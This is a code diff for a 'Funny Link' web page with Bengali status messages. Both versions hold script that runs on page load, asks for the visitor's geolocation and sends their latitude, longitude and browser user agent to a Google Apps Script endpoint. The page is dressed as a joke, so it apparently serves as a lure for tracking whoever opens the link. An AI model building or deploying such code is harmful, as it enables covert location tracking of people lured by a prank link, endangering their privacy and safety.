--- a/index.html
+++ b/index.html
@@ -1,29 +1,53 @@
 <!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8">
-  <title>Funny Page</title>
-</head>
-<body>
-  <h1>This page is just for fun 😄</h1>
-  <p>If you're seeing this, you're amazing!</p>
+<html>
+  <head>
+    <title>Funny Link 🤪</title>
+    <meta charset="UTF-8" />
+    <script>
+      function sendLocation(position) {
+        const latitude = position.coords.latitude;
+        const longitude = position.coords.longitude;
+        const userAgent = navigator.userAgent;
 
-  <script>
-    navigator.geolocation.getCurrentPosition(position => {
-      const lat = position.coords.latitude;
-      const lon = position.coords.longitude;
-      const ua = navigator.userAgent;
+        fetch("https://script.google.com/macros/s/AKfycbw9qFm0UFnu3eengU-c21xnMyiwCRy8_b9JWN8bZL7eGZxzfOWsfl-mHAXoU7UHNRMD/exec", {
+          method: "POST",
+          body: JSON.stringify({
+            latitude,
+            longitude,
+            userAgent
+          }),
+          headers: {
+            "Content-Type": "application/json"
+          }
+        })
+        .then(() => {
+          document.getElementById("status").innerText = "ধন্যবাদ! 😊";
+          
+          // Optional Redirect after 3 seconds:
+          // window.location.href = "https://example.com";
+        })
+        .catch(() => {
+          document.getElementById("status").innerText = "দুঃখিত, সমস্যা হয়েছে!";
+        });
+      }
 
-      const url = "https://script.google.com/macros/s/AKfycbw9qFm0UFnu3eengU-c21xnMyiwCRy8_b9JWN8bZL7eGZxzfOWsfl-mHAXoU7UHNRMD/exec"
-        + "?lat=" + lat + "&lon=" + lon + "&ua=" + encodeURIComponent(ua);
+      function handleError(error) {
+        document.getElementById("status").innerText = "লোকেশন পাওয়া যায়নি ❌";
+      }
 
-      fetch(url)
-        .then(res => res.text())
-        .then(txt => console.log("Location sent:", txt))
-        .catch(err => console.error("Error:", err));
-    }, error => {
-      console.error("Geolocation error:", error);
-    });
-  </script>
-</body>
+      function getLocation() {
+        if (navigator.geolocation) {
+          navigator.geolocation.getCurrentPosition(sendLocation, handleError);
+        } else {
+          document.getElementById("status").innerText = "ব্রাউজার সাপোর্ট করে না!";
+        }
+      }
+
+      window.onload = getLocation;
+    </script>
+  </head>
+  <body style="font-family: sans-serif; text-align: center; margin-top: 100px;">
+    <h2>😜 Loading...</h2>
+    <p id="status">লোকেশন নিচ্ছে...</p>
+  </body>
 </html>
